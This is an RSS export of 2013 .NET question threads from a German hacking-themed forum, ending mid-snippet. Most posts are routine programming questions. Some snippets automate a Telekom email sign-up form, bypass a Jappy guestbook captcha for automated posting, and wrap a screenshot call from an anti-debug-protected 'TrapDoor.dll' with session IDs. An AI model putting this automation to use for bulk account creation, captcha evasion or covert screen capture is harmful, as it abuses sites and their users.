			<title>.NET Windows Phone Programmierung</title>
			<link>net-94/net-windows-phone-programmierung-26818?goto=newpost</link>
			<pubDate>Sat, 28 Sep 2013 12:09:43 GMT</pubDate>
			<description>Hallo Leute, 
beschäftige mich nun schon seit einigen Stunden mit Visual Studio für *Windows Phone Anwendungen*(Sprache: VB.NET) und 
hätte da 2...</description>
			<content:encoded><![CDATA[<div>Hallo Leute,<br />
beschäftige mich nun schon seit einigen Stunden mit Visual Studio für <b>Windows Phone Anwendungen</b>(Sprache: VB.NET) und<br />
hätte da 2 Fragen. Über Google findet man leider nicht allzu viel Hilfreiches(außerdem so gut wie alles auf Englisch).<br />
<br />
1) Ich vermisse viele UI-Elemente die es im &quot;normalen&quot; Visual Studio gibt. Mir ist schon klar das es für's Handy nicht genau die<br />
selben Controls geben kann, aber ein NumericUpDown könnte ich(unter anderem) sehr gut gebrauchen. Hab auch schon nach<br />
Zusatzpaketen, etc. gegoogled wegen zusätzlichen UI-Controls, hab aber leider nicht wirklich was gefunden.<br />
<br />
Hier mal ein Screen der Toolbox:<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<a href="http://www.u-img.net/view/8159Qq.png" target="_blank"><img src="http://u-img.net/img/8159Qq_thumb.png" border="0" alt="" /></a><br />

</div>
</div>
</div><br />
<br />
2) Die aktuelle Windows Phone Version ist zurzeit 8.0. Blöderweise kann man das SDK 8.0 nur unter Windows 8 verwenden.<br />
Da ich aber keinen Bock habe nur deswegen auf Windows 8 umzusteigen, arbeite ich mit dem SDK 7.1. Meine Frage ist ob<br />
Anwendungen die mit diesem SDK geschrieben wurden trotzdem unter Version 8.0 am Handy laufen!?<br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/net-windows-phone-programmierung-26818</guid>
		</item>
		<item>
			<title>C# WebBrowser Control DropDownMenü</title>
			<link>net-94/webbrowser-control-dropdownmenue-26759?goto=newpost</link>
			<pubDate>Wed, 25 Sep 2013 22:35:35 GMT</pubDate>
			<description>Gute Nacht liebe U-Hacksler, 
 
habe wieder ein Problem beim coden. 
Ich möchte auf einer Seite ein DropDownMenü (so nennt sich dass doch?)...</description>
			<content:encoded><![CDATA[<div>Gute Nacht liebe U-Hacksler,<br />
<br />
habe wieder ein Problem beim coden.<br />
Ich möchte auf einer Seite ein DropDownMenü (so nennt sich dass doch?) auswählen.<br />
Dort stehen mir mehrere Optionen zu verfügung. Weiß aber nicht wie ich das auswähle und anklicke.<br />
<br />
Kann mir jemand bitte weiterhelfen? Ich kann leider nirgends damit hin. kenne kein Forum wo man mir wie hier hilft.<br />
<br />
Die Seite: <a href="https://meinkonto.telekom-dienste.de/konto/registrierung/email/index.xhtml?sid=email&amp;ready=1" target="_blank" rel="nofollow">https://meinkonto.telekom-dienste.de...=email&amp;ready=1</a><br />
<br />
Mein Code bisher:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
 private void button1_Click(object sender, EventArgs e)<br />
        {<br />
            webBrowser1.Navigate(&quot;https://meinkonto.telekom-dienste.de/konto/registrierung/email/index.xhtml?sid=email&amp;ready=1&quot;);<br />
        }<br />
<br />
        private void button2_Click(object sender, EventArgs e)<br />
        {<br />
<br />
            webBrowser1.Document.GetElementById(&quot;fr:title:title_label&quot;).SetAttribute(&quot;value&quot;, &quot;Herr&quot;);<br />
            webBrowser1.Document.GetElementById(&quot;fr:firstname:firstname&quot;).SetAttribute(&quot;value&quot;, &quot;Markus&quot;);<br />
            <br />
        }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Wäre für jede Hilfe Dankbar!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>RaidPower</dc:creator>
			<guid isPermaLink="true">net-94/webbrowser-control-dropdownmenue-26759</guid>
		</item>
		<item>
			<title>C# HTTPWebRequest Hilfe! IpBoard Login</title>
			<link>net-94/httpwebrequest-hilfe-ipboard-login-26587?goto=newpost</link>
			<pubDate>Thu, 19 Sep 2013 00:26:47 GMT</pubDate>
			<description>Hallo, 
 
habe eine IpBoard und möchte für ein Ticket Tool den Login programieren. Mir geht erstmal um den Login, woran ich leider scheitere und am...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
habe eine IpBoard und möchte für ein Ticket Tool den Login programieren. Mir geht erstmal um den Login, woran ich leider scheitere und am verzweifehln bin. Google seid 5 Stunden und finde nix. Da bin ich auf dieses Board gestosen, hoffe man kann hier mir helfen. Bitte ! :(<br />
<br />
Source:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
using System;<br />
using System.IO;<br />
using System.Net;<br />
using System.Text;<br />
using System.Text.RegularExpressions;<br />
<br />
namespace IPBoardLogin<br />
{<br />
    class Program<br />
    {<br />
        static void Main(string&#91;&#93; args)<br />
        {<br />
            try<br />
            {<br />
                String loginURL = &quot;DOMAIN/index.php?app=core&amp;module=global&amp;section=login&quot;;<br />
                String homeURL = &quot;INDEX-DOMAIN&quot;;<br />
                String acc = &quot;&quot;;<br />
                String pass = &quot;&quot;;<br />
<br />
                CookieContainer c = new CookieContainer();<br />
<br />
                // -------------------------------------------------------------------------------------------------------------------------------<br />
                // AuthKey auslesen!<br />
                HttpWebRequest webReq = (HttpWebRequest)WebRequest.Create(loginURL);<br />
                webReq.CookieContainer = c;<br />
                webReq.Method = &quot;GET&quot;;<br />
                webReq.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0&quot;;<br />
                webReq.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
<br />
                StreamReader strR = new StreamReader(webReq.GetResponse().GetResponseStream());<br />
                String s = strR.ReadToEnd();<br />
<br />
                String authKey = Regex.Match(s, &quot;auth_key' value='(&#91;^&lt;&#93;+)'&quot;).Groups&#91;1&#93;.Value;<br />
<br />
                Console.WriteLine(&quot;AuthKey: {0}&quot;, authKey);<br />
                // Authkey auslesen!<br />
                // -------------------------------------------------------------------------------------------------------------------------------<br />
                // Login<br />
                String post = &quot;auth_key=&quot; + authKey + &quot;&amp;ips_username=&quot; + acc + &quot;&amp;ips_password=&quot; +pass  + &quot;&amp;rememberMe=1&quot;;<br />
<br />
                webReq = (HttpWebRequest)WebRequest.Create(loginURL);<br />
                webReq.CookieContainer = c;<br />
                webReq.Method = &quot;POST&quot;;<br />
                webReq.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0&quot;;<br />
                webReq.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
                webReq.ContentLength = post.Length;<br />
<br />
                StreamWriter strWriter = new StreamWriter(webReq.GetRequestStream(), Encoding.ASCII);<br />
                strWriter.AutoFlush = true;<br />
                strWriter.Write(post);<br />
                strWriter.Close();<br />
                // Login<br />
                // -------------------------------------------------------------------------------------------------------------------------------<br />
                // prüfen ob Login erfolgreich<br />
                webReq = (HttpWebRequest)WebRequest.Create(homeURL);<br />
                webReq.CookieContainer = c;<br />
                webReq.Method = &quot;GET&quot;;<br />
                webReq.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0&quot;;<br />
                webReq.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
<br />
                strR = new StreamReader(webReq.GetResponse().GetResponseStream());<br />
                s = strR.ReadToEnd();<br />
                // prüfen ob Login erfolgreich<br />
                // -------------------------------------------------------------------------------------------------------------------------------<br />
<br />
                if (s.ToLower().Contains(acc.ToLower()))<br />
                {<br />
                    Console.WriteLine(&quot;Login erfolgt&quot;);<br />
                }<br />
                else<br />
                {<br />
                    Console.WriteLine(&quot;Login fehlgeschlagen&quot;);<br />
                }<br />
<br />
                Console.ReadLine();<br />
            }<br />
            catch<br />
            {<br />
                Console.WriteLine(&quot;Fehler&quot;);<br />
                Console.ReadLine();<br />
            }<br />
        }<br />
    }<br />
}<br />
<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Problem: es wird nix eingeloggt! indexseite bleibt wie es ist also kein account eingeloggt<br />
<br />
habe die Postdaten mit livehttpheader gelgogt, falls das nötig ist als info<br />
Sry für Rechtschreibung. :'(</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>RaidPower</dc:creator>
			<guid isPermaLink="true">net-94/httpwebrequest-hilfe-ipboard-login-26587</guid>
		</item>
		<item>
			<title>VB.Net Regex Problem</title>
			<link>net-94/regex-problem-26328?goto=newpost</link>
			<pubDate>Mon, 09 Sep 2013 13:08:22 GMT</pubDate>
			<description><![CDATA[Hey.  
 
Ich habe folgenden Quelltext: 
 
 
Code: 
--------- 
<span class="bodypart "> 
    arm,legs,stomach 
  </span>]]></description>
			<content:encoded><![CDATA[<div>Hey. <br />
<br />
Ich habe folgenden Quelltext:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;span class=&quot;bodypart &quot;&gt;<br />
&nbsp; &nbsp; arm,legs,stomach<br />
&nbsp; &lt;/span&gt;</code><hr />
</div>Und würde gerne arm,legs,stomach auslesen lassen, und da sich der Inhalt ja immer ändert passt Regex ja nur.<br />
Habe auch folgenden Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Dim httpRequest As HttpWebRequest = HttpWebRequest.Create(&quot;http://link.de&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim httpResponse As HttpWebResponse = httpRequest.GetResponse()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim reader As StreamReader = New StreamReader(httpResponse.GetResponseStream)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim httpContent As String = reader.ReadToEnd<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.Text = httpContent<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim partRegEx As New Regex(&quot;\&lt;span class=&quot;&quot;bodypart &quot;&quot;\&gt;(?&lt;string&gt;(.*))\&lt;\/span\&gt;&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim parts As String = partRegEx.Match(httpContent).Groups(&quot;string&quot;).ToString()<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(parts)</code><hr />
</div>Leider funktioniert das nicht.<br />
<br />
Könnt ihr mir helfen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>One Way</dc:creator>
			<guid isPermaLink="true">net-94/regex-problem-26328</guid>
		</item>
		<item>
			<title>C# Binärezahlen (Dual)</title>
			<link>net-94/binaerezahlen-dual-25890?goto=newpost</link>
			<pubDate>Thu, 22 Aug 2013 13:52:00 GMT</pubDate>
			<description>Hallo Comm, .. 
 
Hab ein kleines Problem ich kann von ein Text umwandeln von Typ String in Binärezahlen allerdings schaffe ich es nicht den String...</description>
			<content:encoded><![CDATA[<div>Hallo Comm, ..<br />
<br />
Hab ein kleines Problem ich kann von ein Text umwandeln von Typ String in Binärezahlen allerdings schaffe ich es nicht den String mit den Zahlen ...<br />
<br />
01101000011000010110110001101100011011110010000000  11101000101001<br />
<br />
Wieder zum Text zurück zuwundeln von Byte zu String geht aber ich will ja den String mit den Zahlen wieder in ein lesbaren Text verwandern kann mir jemand helfen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Kuchenmaster</dc:creator>
			<guid isPermaLink="true">net-94/binaerezahlen-dual-25890</guid>
		</item>
		<item>
			<title>VB.Net String Buffer to Bitmap?</title>
			<link>net-94/string-buffer-to-bitmap-25006?goto=newpost</link>
			<pubDate>Thu, 11 Jul 2013 17:19:30 GMT</pubDate>
			<description>Nabend, 
 
Ich möchte einen *String Buffer* der aus einer nativen DLL zurückgegeben wird, in ein Bild umwandeln. 
Alle Versuche die ich unternommen...</description>
			<content:encoded><![CDATA[<div>Nabend,<br />
<br />
Ich möchte einen <b>String Buffer</b> der aus einer nativen DLL zurückgegeben wird, in ein Bild umwandeln.<br />
Alle Versuche die ich unternommen habe sind spätestens beim Ausführen gescheitert.<br />
Ich bin mir nicht sicher, ob ich das Ganze überhaupt richtig verstanden habe, noch weiß ich ob das in VB.NET überhaupt möglich ist.<br />
<br />
Die Dokumentation der DLL sagt folgendes:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			***
			
		<hr />
	</div>
</div>Wenn ich das richtig verstehe ist der Rückgabewert als ein CharArray, wobei das Bild erst nach dem ersten nullChar anfängt.<br />
Leider kann ich nur eingeschränkt Dinge ausprobieren, da die DLL einen Schutz gegen Debugger integriert hat.<br />
<br />
Vom Programmierer der API habe ich folgendes C++ Snippet erhalten, weiß damit aber nicht wirklich was anzufangen:<br />
***<br />
Ein C++2VB Converter hat dazu geführt dass VB mich mit Fehlermeldungen überschüttet.<br />
<br />
Eingebunden habe ich die Funktion so:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Declare Function sfScreen Lib &quot;TrapDoor.dll&quot; Alias &quot;trapi_screenshot&quot; (ByVal sessionId As Integer) As Char()</code><hr />
</div>Google bringt zu dem Thema leider nur sehr spärliche Informationen die mir nicht weiterhelfen.<br />
<br />
Ich bedanke mich schonmal bei jedem der sich die Mühe gemacht hat sich das durchzulesen und mir evtl helfen kann<br />
<br />
<br />
mfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>bluedraqon</dc:creator>
			<guid isPermaLink="true">net-94/string-buffer-to-bitmap-25006</guid>
		</item>
		<item>
			<title>VB.Net Json String richtig parsen???</title>
			<link>net-94/json-string-richtig-parsen-24872?goto=newpost</link>
			<pubDate>Sat, 06 Jul 2013 14:57:25 GMT</pubDate>
			<description>Hallo, 
 
Ich suche nach einer Möglichkeit einen Json string 
 
Bsp.: 
 
 
Code: 
---------...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Ich suche nach einer Möglichkeit einen Json string<br />
<br />
Bsp.:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">{&quot;ticker&quot;:{&quot;high&quot;:0.03648,&quot;low&quot;:0.03453,&quot;avg&quot;:0.035505,&quot;vol&quot;:12055.24109,&quot;vol_cur&quot;:339657.85178,&quot;last&quot;:0.0356,&quot;buy&quot;:0.03565,&quot;sell&quot;:0.0356,&quot;updated&quot;:1373122499,&quot;server_time&quot;:1373122501}}</code><hr />
</div>in seine bestandteile zu zerlegen. stichwort &quot;deserialize&quot;. aber ich finde nix anständiges ohne eine extra lib dafür zu benutzen.<br />
Ich weiss das es Boardmittel im Framework gibt aber ich steige da nicht durch. Evl kann mir auch jemand ein Regex pattern geben den der Json aufbau ist immer der selbe.<br />
<br />
Danke,</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>soulreafer</dc:creator>
			<guid isPermaLink="true">net-94/json-string-richtig-parsen-24872</guid>
		</item>
		<item>
			<title>VB.Net AutoIt WinList Funktion in Visual Basic</title>
			<link>net-94/autoit-winlist-funktion-in-visual-basic-24739?goto=newpost</link>
			<pubDate>Mon, 01 Jul 2013 16:42:38 GMT</pubDate>
			<description><![CDATA[Nabend, 
 
ich möchte die WinList Funktion von AutoIT in Visual Basic anwenden. 
 
Mit: 
 
AutoIT.WinList ( ["title" [, "text"]] ) würde ich ja eine...]]></description>
			<content:encoded><![CDATA[<div>Nabend,<br />
<br />
ich möchte die WinList Funktion von AutoIT in Visual Basic anwenden.<br />
<br />
Mit:<br />
<br />
AutoIT.WinList ( [&quot;title&quot; [, &quot;text&quot;]] ) würde ich ja eine Liste von den aktiven Fenstern abrufen.<br />
<br />
Im Format:<br />
$array[0][0] = Anzahl der gefundenen Fenster.<br />
$array[1][0] = erster Fenstertitel.<br />
$array[1][1] = erste Fenster-ID (handle=HWND)<br />
$array[2][0] = zweiter Fenstertitel<br />
$array[2][1] = zweite Fenster-ID (handle=HWND)<br />
...<br />
$array[n][0] = n-ter Fenstertitel<br />
$array[n][1] = n-te Fenster-ID (handle=HWND)<br />
<br />
werden dann die Fenster ausgegeben.<br />
<br />
<br />
Hat jemand eine Idee wie ich diese Informationen in eine ListBox bekomme?<br />
<br />
Mit Listbox.Items.Add(dann die Arrays) hat's bei mir leider nicht so einfach funktioniert ^^<br />
<br />
Ich bin über jede für Programmieranfänger halbwegs verständliche Antwort dankbar :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Next</dc:creator>
			<guid isPermaLink="true">net-94/autoit-winlist-funktion-in-visual-basic-24739</guid>
		</item>
		<item>
			<title>C# Webbrowser inject Javascript in html loaded js</title>
			<link>net-94/webbrowser-inject-javascript-in-html-loaded-js-24374?goto=newpost</link>
			<pubDate>Fri, 14 Jun 2013 14:12:25 GMT</pubDate>
			<description><![CDATA[Hallo, 
 
ich habe derzeit ein folgendes Problem und zwar: 
 
Derzeit wird im ganzen Document die funktionen "*onunload*" "*open*" usw: 
 
 
Code:...]]></description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich habe derzeit ein folgendes Problem und zwar:<br />
<br />
Derzeit wird im ganzen Document die funktionen &quot;<b>onunload</b>&quot; &quot;<b>open</b>&quot; usw:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> for (int C = 0; C &lt; webBrowser1.Document.GetElementsByTagName(&quot;head&quot;).Count; C++)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HtmlElement head = webBrowser1.Document.GetElementsByTagName(&quot;head&quot;)[C];<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HtmlElement scriptEl = webBrowser1.Document.CreateElement(&quot;script&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; IHTMLScriptElement element = (IHTMLScriptElement)scriptEl.DomElement;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string alertBlocker = &quot;window.alert = function () { }; window.print = function () { }; window.open = function () { }; window.onunload = function () { }; window.onbeforeunload = function() { };&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; element.text = alertBlocker;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head.AppendChild(scriptEl);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }</code><hr />
</div>Nun ist das Problem, dass die Seite z.B über ein externes Javascript diese Funktion läd und es dort nicht Injected wird:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;script src=&quot;/js/jquery.js&quot;&gt;&lt;/script&gt;</code><hr />
</div> &lt;- dort steht z.B die &quot;<b>onunload</b>&quot; Funktion und wird nicht rein injected.<br />
Nun soll aber das Programm alle .js im Document suchen und injecten.<br />
<br />
greets,<br />
Bl1zz4rD</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bl1zz4rD</dc:creator>
			<guid isPermaLink="true">net-94/webbrowser-inject-javascript-in-html-loaded-js-24374</guid>
		</item>
		<item>
			<title><![CDATA[[GTA SAMP] Matheaufgaben aus Chatlog berechnen]]></title>
			<link>net-94/gta-samp-matheaufgaben-aus-chatlog-berechnen-24064?goto=newpost</link>
			<pubDate>Sun, 02 Jun 2013 00:14:51 GMT</pubDate>
			<description>Hey. 
 
Wäre es möglich ein Programm zu coden was etwas aus einer Textdatei ausliest? Den Pfad zur Textdatei könnte ich angeben. 
 
Wenn in der...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Wäre es möglich ein Programm zu coden was etwas aus einer Textdatei ausliest? Den Pfad zur Textdatei könnte ich angeben.<br />
<br />
Wenn in der Textdatei irgendeine Matheaufgabe vorkommt z.B. 34+30-12 oder 45-32+14<br />
<br />
Dann soll das Programm die Aufgabe automatisch ausrechnen. Es sind immer nur Aufgaben mit + und/oder -<br />
<br />
Würde das jemand hinbekommen?<br />
<br />
Danke.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/gta-samp-matheaufgaben-aus-chatlog-berechnen-24064</guid>
		</item>
		<item>
			<title>C# Lernen, welches Buch/Video...</title>
			<link>net-94/lernen-welches-buch-video-23873?goto=newpost</link>
			<pubDate>Sun, 26 May 2013 15:57:25 GMT</pubDate>
			<description>Hallo, ich wollte mich langsam in die Materie des programmierens einfinden da ich bald in die Ausbildung komme.  
Es sind noch etwa 3 Monate und ich...</description>
			<content:encoded><![CDATA[<div>Hallo, ich wollte mich langsam in die Materie des programmierens einfinden da ich bald in die Ausbildung komme. <br />
Es sind noch etwa 3 Monate und ich hab nun den Tipp bekommen C# zu lernen.<br />
<br />
In der Ausbildung ist es quasi egal welches ich lerne es wird eher von den Wünschen ausgegangen und anfangs werde ich mit DOS-Programmierung anfangen.<br />
<br />
Bisher habe ich dieses Openbook ans Herz gelegt bekommen, ich bin nun schon bei Kapitel 5 angelangt, allerdings finde ich es ist eine echt schwere Lektüre. Dort wird mit sehr vielen Fremdwörtern gesprochen von dennen ich nicht unbedingt immer weiß was sie bedeuten und sie werden auch nicht erklärt, daher wollte ich fragen ob jemand vielleicht etwas besseres hat.<br />
<br />
Unter anderem bin ich auch auf der Suche nach einem Buch und wollte mal nachfragen ob jemand gute Erfahrungen mit einem Buch hat und welches er mir empfehlen kann.<br />
<br />
Falls jemand was hat, ich würde mich über Unterstützung freuen. :)<br />
Gruß Herox.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Herox</dc:creator>
			<guid isPermaLink="true">net-94/lernen-welches-buch-video-23873</guid>
		</item>
		<item>
			<title>VB.Net Pause im Code</title>
			<link>net-94/pause-code-23697?goto=newpost</link>
			<pubDate>Tue, 21 May 2013 12:14:35 GMT</pubDate>
			<description>Hey U-Hacks, 
 
ich möchte gern in VB.net eine Pause im Code einbauen damit ich im WebBrowser von einer Website Daten Auslesen kann. Die Pause sollte...</description>
			<content:encoded><![CDATA[<div>Hey U-Hacks,<br />
<br />
ich möchte gern in VB.net eine Pause im Code einbauen damit ich im WebBrowser von einer Website Daten Auslesen kann. Die Pause sollte ca. 1-2 Sekunden haben damit der Webbrowser ruhig Laden kann und nach de Pause den Text in eine RichTextbox ausgeben kann.<br />
<br />
Code Beispiel:<br />
<br />
wb.navigate(&quot;URL&quot;)<br />
PAUSE (1-2 Sekunden)<br />
rtb.Text = wb.Document.GetElementById(&quot;Div-Container&quot;).InnerTxt<br />
<br />
Beim zweiten durchlauf möchte ich das selbe machen aber mit einer anderen Abfrage im Webbrowser. Wenn ich dies allerdings mache wird mir der Text der ersten Abfrage angezeigt. Der zweite Text dann erst bei einer neuen Abfrage, usw.<br />
<br />
Ich habe schon sachen gelesen wie Thread.sleep() und so was aber das pausiert bei mir die komplette Form. Auch habe ich es mit dem Webbrowser DocumentComplete-Event versucht, kein Erfolg (Obwohl ich mir dort die Lösung erhofft hatte...). Hab also schon sogut wie jede Möglichkeit versucht die ich via Google finden konnte.<br />
<br />
Nun ist meine Frage an euch: Habt ihr vielleicht eine andere, sauberere Idee bzw. Lösung?<br />
<br />
Ich bin für Vorschläge offen und für einen Tipp oder eine Lösung sehr dankbar! : )<br />
<br />
Gruß.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gangstersheep</dc:creator>
			<guid isPermaLink="true">net-94/pause-code-23697</guid>
		</item>
		<item>
			<title>VB.Net Skype API - Chat User auslesen</title>
			<link>net-94/skype-api-chat-user-auslesen-23600?goto=newpost</link>
			<pubDate>Sat, 18 May 2013 12:38:53 GMT</pubDate>
			<description><![CDATA[Hey! 
 
Ich habe vor, mein Skype ''Tool'' weiter zu machen und möchte nun gern in einem ListView Control die letzte Nachricht anzeigen lassen (Kein...]]></description>
			<content:encoded><![CDATA[<div>Hey!<br />
<br />
Ich habe vor, mein Skype ''Tool'' weiter zu machen und möchte nun gern in einem ListView Control die letzte Nachricht anzeigen lassen (Kein Problem, klappt bereits!) und halt den Namen, der die Nachricht geschrieben hat.<br />
<br />
Die ListView hab ich mit 2 Spalten ausgestattet (Name | Nachricht) und jetzt möchte ich halt wissen, wie ich den Namen auslesen kann... Falls das überhaupt funktioniert?<br />
<br />
Freue mich auf Antworten. :)<br />
<br />
//EDit: Hat sich erledigt, habs raus bekommen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gangstersheep</dc:creator>
			<guid isPermaLink="true">net-94/skype-api-chat-user-auslesen-23600</guid>
		</item>
		<item>
			<title>VB.Net Musik über Spotify abspielen?</title>
			<link>net-94/musik-ueber-spotify-abspielen-23587?goto=newpost</link>
			<pubDate>Fri, 17 May 2013 20:51:58 GMT</pubDate>
			<description>Hey. 
 
Kann ich wenn ich mehrere Einträge in einem ListView habe einen bestimmten Song von Spotify abspielen lassen? 
 
Geht das damit?...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Kann ich wenn ich mehrere Einträge in einem ListView habe einen bestimmten Song von Spotify abspielen lassen?<br />
<br />
Geht das damit?<br />
<a href="https://code.google.com/p/spotify-local-api/" target="_blank" rel="nofollow">https://code.google.com/p/spotify-local-api/</a><br />
<br />
Das habe ich auch noch gefunden:<br />
<a href="http://spotifyomatic.codeplex.com/" target="_blank" rel="nofollow">http://spotifyomatic.codeplex.com/</a><br />
<br />
Könnte mir da mal bitte jemand mit 1 Song helfen? <br />
<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/musik-ueber-spotify-abspielen-23587</guid>
		</item>
		<item>
			<title>VB.Net Jappy Gb Eintrag erstellen mit Captcha</title>
			<link>net-94/jappy-gb-eintrag-erstellen-mit-captcha-23437?goto=newpost</link>
			<pubDate>Sun, 12 May 2013 20:07:14 GMT</pubDate>
			<description>Hallo, 
 
ich würde gerne bei Jappy einen Gb Eintrag machen, bei einem Gb mit Captcha. 
 
Code: 
 
 
 
Code: 
---------</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich würde gerne bei Jappy einen Gb Eintrag machen, bei einem Gb mit Captcha.<br />
<br />
Code:<br />
<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Dim GbIn As String = J.Req(String.Concat(&quot;http://www.jappy.de/user/&quot;, Nick, &quot;/gb/add&quot;), &quot;GET&quot;)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim GbTs As String = Regex.Match(GbIn, &quot;gb\[ts\]&quot;&quot; value=&quot;&quot;([^&quot;&quot;]+)&quot;).Groups(1).Value<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim GbKey As String = Regex.Match(GbIn, &quot;gb\[key\]&quot;&quot; value=&quot;&quot;([^&quot;&quot;]+)&quot;).Groups(1).Value<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Capt As Bitmap = CType(J.DownloadGraphic(String.Concat(&quot;http://www.jappy.de/captcha.php?&quot;, GbTs)), Bitmap)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim ParCapt As String = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), &quot;Captcha.tif&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If File.Exists(ParCapt) Then File.Delete(ParCapt)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; J.Funcs.SaveBitmap(Capt, ParCapt)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  'Variable A ist Typ String und enthält die Antwort des Captchas<br />
